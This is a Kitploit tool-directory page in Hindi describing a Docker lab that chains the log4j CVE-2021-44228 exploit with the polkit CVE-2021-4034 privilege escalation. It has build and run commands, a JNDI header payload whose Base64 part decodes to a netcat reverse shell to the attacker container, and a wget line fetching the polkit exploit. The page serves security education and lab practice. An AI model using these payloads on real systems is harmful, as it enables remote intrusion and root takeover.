Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-polkit-poc — कमजोर सेटअप जो log4j CVE-2021-44228 के हमले की श्रृंखला को प्रदर्शित करता है, जिसमें polkit एक्सप्लॉइट CVE-2021-4034 का उपयोग करके रूट तक विशेषाधिकार वृद्धि की जाती है | Kitploit
उपकरण/GitHubGitHub/0xalwayslucky/log4j-polkit-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास
GitHub0xalwayslucky/log4j-polkit-poc

log4j-polkit-poc

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

कमजोर सेटअप जो log4j CVE-2021-44228 के हमले की श्रृंखला को प्रदर्शित करता है, जिसमें polkit एक्सप्लॉइट CVE-2021-4034 का उपयोग करके रूट तक विशेषाधिकार वृद्धि की जाती है

रिपॉजिटरी देखें
124 साल पहलेअभी तक समीक्षित नहीं

log4j CVE-2021-44228 + polkit CVE-2021-4034

log4j अपाचे शोषण और polkit का उपयोग करके विशेषाधिकार वृद्धि के लिए संवेदनशील इंस्टेंस

  • संवेदनशील spring-boot-application.jar को इस डॉकर इमेज से निकाला गया था
  • दुर्भावनापूर्ण JNDI सर्वर को यहाँ से डाउनलोड किया गया था और इस लेख में संदर्भित किया गया है।

PoC वीडियो

PoC वीडियो

संवेदनशील इंस्टेंस बनाना

log4j-polkit-vuln

नीचे दिए गए चरणों के पूरा होने पर संवेदनशील इंस्टेंस चालू होगा और पोर्ट 80 (होस्ट मशीन पर उजागर) पर कनेक्शन सुन रहा होगा। log4j शोषण के लिए संवेदनशील भाग X-Api-Version हेडर है जो सर्वर को भेजा जाता है।

डॉकर: log4j-polkit-vulnerable-server

संवेदनशील डॉकर इमेज को खींचने और चलाने के चरण:

root@kitploit:~
docker pull 0xalwayslucky/log4j-polkit-vulnerable-server
docker run -p 80:8080 0xalwayslucky/log4j-polkit-vulnerable-server

log4j + polkit के लिए मैन्युअल रूप से संवेदनशील इंस्टेंस बनाने के चरण:

नोट: Dockerfiles को उबंटू रिपॉजिटरी में संवेदनशील अनुप्रयोगों के कुछ विशिष्ट संस्करणों की उपस्थिति की आवश्यकता होती है। यदि इन्हें किसी भी समय अपडेट और/या हटा दिया जाता है तो डॉकर इमेज बनाने में विफल हो जाएगी। इसे हल करने के लिए एक इमेज डॉकर हब पर अपलोड की जाएगी और यहाँ लिंक की जाएगी।

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/log4j-polkit-vuln
docker build -t log4j-polkit-vulnerable-server .
docker run -p 80:8080 --hostname victim log4j-polkit-vulnerable-server

attackserver

यह हमलावर की मशीन का अनुकरण करेगा, इस मामले में उसी नेटवर्क के भीतर मौजूद (डॉकर कंटेनरों के बीच आसान संचार के कारण), लेकिन शोषण तब भी काम करता है जब यह अटैक सर्वर कहीं भी स्थित हो (एकमात्र शर्त यह है कि यह पीड़ित के लिए सुलभ हो)। दुर्भावनापूर्ण JNDI सर्वर यहाँ होस्ट किया जाएगा और पीड़ित की मशीन पर मनमाने कमांड निष्पादित करने के लिए एक दुर्भावनापूर्ण क्लास बनाएगा।

अनुकरणीय हमलावर मशीन बनाने के चरण:

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/attackserver
docker build -t attackserver .
docker run -it --hostname attackserver attackserver /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <ip> -p 8888 &  # in the docker container

शोषण

poc-वीडियो के कमांड

नोट: attackserver का IP पता भिन्न हो सकता है

root@kitploit:~
# Log4j शोषण
curl http://localhost -H 'X-Api-Version: ${jndi:ldap://172.17.0.3:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMyA0NDQ0IC1lIC9iaW4vYmFzaA==}'

# Polkit शोषण
wget https://raw.githubusercontent.com/afwu/CVE-2021-4035/main/cve-2021-4034-poc.c

टूल डाउनलोड करें